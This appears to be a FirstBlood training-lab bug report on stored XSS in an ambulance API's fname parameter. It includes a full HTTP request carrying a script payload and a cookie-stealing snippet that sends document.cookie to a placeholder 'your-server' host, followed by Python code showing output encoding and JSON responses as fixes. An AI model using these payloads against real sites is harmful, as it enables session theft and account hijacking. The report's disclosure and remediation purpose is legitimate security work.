FirstBlood-#1186 Stored XSS on ambulance API
This issue was discovered on FirstBlood v3
On 2022-12-08, ayush1098 Level 8 reported:

Hello Team,

Summary:

I have found a Stored XSS on the /api/ambulances.php endpoint in the fname parameter. From reading the error, I knew that we have to create an appointment with the ambulance=1 parameter while booking the appointment. The value of the name is reflected on the API endpoint, which you can find in the source code.

Steps To reproduce:

  1. Book an appointment and intercept the request.

  2. Add the ambulance=1 parameter and your payload in the fname parameter at the end of the request and book the appointment. The request should look like this.

POST /api/ba.php HTTP/1.1
Host: 8eb52721f54a-ayush1098.a.firstbloodhackers.com
Cookie: drps=56a87bb157ed7beab25e2950a
Content-Length: 173
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
Anti-Csrf: 70688-7155-95996
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://8eb52721f54a-ayush1098.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://8eb52721f54a-ayush1098.a.firstbloodhackers.com/book-appointment.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close

fname="><script>alert()</script>&lname=fsdf&address=sdfdsf&city=sfsf&phonenumber=ssdf&[email protected]&dob=12/23/2022&a1=sdfds&a2=fsfsf&a3=sdfs&message=dfdfs&slot=1&ambulance=1

  3. Now copy the id and visit https://8eb52721f54a-ayush1098.a.firstbloodhackers.com/api/ambulances.php?select=<your-id>

You will see the magic box pop up after this.

We can use this payload to steal the cookies of the admin user:

<script>
alert(document.cookie);
var i=new Image;
i.src="http://your-server/?"+document.cookie;
</script>

Impact:

Cookie Stealing, Session Hijacking etc.

Thanks & Regards

Ayush Singh

P2 High

Endpoint: /api/ambulances.php

Parameter: fname

Payload: <script>alert()</script>


FirstBlood ID: 53
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on /api/ambulances.php?select={id} via the user's first/last name. For this to work the parameter ambulance=1 must be set.
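The root cause described above is a stored name value written into an HTML response without output encoding. The following is an added illustration of the fix, not FirstBlood's code (the application itself is PHP, where the equivalent is htmlspecialchars($v, ENT_QUOTES, 'UTF-8')); the booking record, the markup template and the function names are constructed for this example, and the fname value is the payload from the report.

```python
import html
import json

# Constructed sample booking: the kind of record the report says ambulances.php
# reads back when ambulance=1 was set. Values are made up for this example.
SAMPLE_BOOKING = {
    "id": 53,
    "fname": '"><script>alert()</script>',
    "lname": "fsdf",
    "ambulance": 1,
}


def render_vulnerable(booking):
    """Hypothetical rendering with the defect class the report describes:
    user data is interpolated straight into HTML, so a value containing
    "> closes the attribute and the tag and the injected <script> executes."""
    return '<div class="patient" data-name="%s">%s %s</div>' % (
        booking["fname"], booking["fname"], booking["lname"])


def html_attr_and_text(value):
    """Encode for HTML text and double-quoted attribute context.
    quote=True also encodes ' and " (the ENT_QUOTES behaviour in PHP)."""
    return html.escape(str(value), quote=True)


def render_hardened(booking):
    """Same markup, with every user-controlled value encoded for the context
    it lands in. The payload is still stored verbatim; it is just displayed
    as text instead of being parsed as markup."""
    return '<div class="patient" data-name="%s">%s %s</div>' % (
        html_attr_and_text(booking["fname"]),
        html_attr_and_text(booking["fname"]),
        html_attr_and_text(booking["lname"]),
    )


def render_json(booking):
    """Alternative for an /api/ endpoint: return data, not markup. With
    Content-Type: application/json (and nosniff so the browser will not
    second-guess the type) the body is never parsed as HTML, so the same
    string cannot execute even though it is returned unchanged."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    body = json.dumps({k: booking[k] for k in ("id", "fname", "lname")})
    return headers, body


def fname_from_json_body(body):
    """Decode the JSON response and return the stored first name."""
    return json.loads(body)["fname"]


def contains_script_tag(markup):
    """Cheap regression check for a test suite: a rendered response must
    never contain a raw <script opening once user data is encoded."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(SAMPLE_BOOKING))
    print("hardened:  ", render_hardened(SAMPLE_BOOKING))
    print("json:      ", render_json(SAMPLE_BOOKING)[1])
```

The hardened renderer encodes per output context rather than stripping input; keeping the stored value intact avoids breaking legitimate names while making the displayed form inert. The JSON variant is the better shape for an endpoint under /api/, since the client then decides how to render and the response never carries executable markup at all.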